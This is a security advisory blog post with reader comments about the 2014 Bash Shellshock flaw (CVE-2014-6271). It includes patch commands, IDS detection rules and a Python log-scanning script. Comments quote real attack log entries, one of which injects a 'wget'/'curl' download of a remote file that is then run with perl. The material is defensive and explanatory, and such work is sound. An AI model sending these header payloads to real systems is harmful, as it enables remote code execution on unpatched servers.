Attention *NIX admins, time to patch!
Over the past years, we became used to Microsoft patches: the important, critical ones that would leave your system fully vulnerable if you didn't apply them. We probably became so used to them that sometimes we forget that our Linux servers also need patches.
Today I learned about a critical Bash patch that addresses CVE-2014-6271. According to the advisory:
"A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue."
Patches are already available for most Linux distributions, including Red Hat and Debian, so waste no time.
---
Pedro Bueno (pbueno /%%/ isc. sans. org)
Twitter: http://twitter.com/besecure
Comments
Debian (Ubuntu, etc.): apt-get upgrade bash
RHEL (Fedora, CentOS, etc.): yum update bash
Anonymous
Sep 24th 2014
https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4
Apache:
alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;)
Bash:
alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;)
Anonymous
Sep 24th 2014
https://access.redhat.com/articles/1200223
Anonymous
Sep 25th 2014
https://access.redhat.com/articles/1200223
Anonymous
Sep 25th 2014
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*
This also appears to be using spoofed source IPs. No logs at this time.
Anonymous
Sep 25th 2014
It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. Wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by).
Anonymous
Sep 25th 2014
89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""
Shouldn't this rate setting the Threat Level to at least chartreuse?
Anonymous
Sep 25th 2014
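To triage web-server log entries like the ones quoted in the comments above, here is an added Python example (mine, not the diary's or any commenter's code) that parses Apache combined-format lines, checks each attacker-controlled field for the exported-function prefix that unpatched bash parses, extracts the trailing payload, and marks whether the targeted CGI path even existed. The sample log is constructed from the quoted lines with documentation-range addresses.

```python
import re
# Constructed sample log, modelled on the Apache combined-format lines quoted in
# the comments above. Addresses are RFC 5737 documentation ranges, not real IoCs.
SAMPLE_LOG = """\
203.0.113.10 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 203.0.113.99"
203.0.113.11 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \\"cd /tmp;wget http://203.0.113.5/x\\""
198.51.100.7 - - [25/Sep/2014:09:00:00 -0700] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.8 - - [25/Sep/2014:09:01:00 -0700] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "curl/7.37.0"
"""

# Apache "combined" format; the user agent is the last field, so a greedy .*
# keeps any escaped quotes inside the attacker-supplied string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# The exported-function prefix bash parses: "() {", a body, "}"; whatever follows
# the closing brace is what an unpatched bash would execute. \s* tolerates
# spacing variants such as "(){" or "() { :; };".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<payload>.*)')

def find_shellshock(line):
    """Return a dict describing the hit, or None if the line looks benign.
    Checks every field a CGI handler copies into the environment (request
    line, Referer, User-Agent): the payload can ride in any header."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    for field in ("req", "referer", "ua"):
        hit = SHELLSHOCK_RE.search(rec[field])
        if hit:
            return {
                "ip": rec["ip"], "ts": rec["ts"], "field": field,
                "status": rec["status"],
                # 404 means the CGI target did not exist, so bash was never
                # reached; a 2xx on a real CGI path is the one to escalate.
                "triage": "escalate" if rec["status"].startswith("2") else "attempt",
                "payload": hit.group("payload").strip(),
            }
    return None

def scan(log_text):
    """Scan a whole log; returns the hits in file order."""
    return [h for h in map(find_shellshock, log_text.splitlines()) if h]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["field"], h["triage"], h["payload"])
```

Lines that hit but returned 404 (as both quoted entries did) are scan noise; a hit with a 2xx status on an existing CGI script means the server should be treated as compromised until proven otherwise.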